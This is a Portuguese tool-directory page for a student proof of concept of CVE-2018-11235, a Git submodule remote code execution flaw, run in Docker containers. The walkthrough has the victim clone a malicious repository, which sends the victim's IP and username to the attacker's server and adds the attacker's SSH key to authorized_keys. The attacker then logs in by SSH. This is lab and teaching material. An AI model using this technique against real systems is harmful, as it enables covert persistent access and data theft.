Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-11235 — Prova de Conceito - Exploração de RCE : vulnerabilidade nos nomes de submódulos do Git - Ensimag Novembro de 2018 | Kitploit
Ferramentas/GitHubGitHub/ygouzerh/cve-2018-11235
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoLabs e Prática
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

Prova de Conceito - Exploração de RCE : vulnerabilidade nos nomes de submódulos do Git - Ensimag Novembro de 2018

Ver Repositório
11há 7 anosAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-11235

Começando

Para construir os contêineres Docker, use:

root@kitploit:~
make docker

(Os seguintes comandos make devem ser executados em paralelo em terminais diferentes a partir da sua máquina)

Para iniciar o contêiner do servidor atacante, use:

root@kitploit:~
make run_server

para iniciar o contêiner que representa a vítima, use:

root@kitploit:~
make run_client

O contêiner irá executar o script client.py. O script irá transmitir seu endereço IP e seu nome de usuário para o pirata.

Siga as instruções do console dos clientes para clonar o repositório git malicioso.

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

Você verá que o endereço IP e o nome de usuário da vítima são transmitidos ao servidor.

Após o clone, verifique se a chave pública dos atacantes foi adicionada ao authorized_keys do cliente.

Em seguida, você pode abrir um shell no cliente a partir do servidor, usando o seguinte comando (a ser executado na sua máquina):

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

Perguntas

Se você tiver algum problema ao executar esta Prova de Conceito, por favor crie uma issue neste repositório: https://github.com/ygouzerh/CVE-2018-11235/issues , responderemos o mais rápido possível.

Baixar ferramenta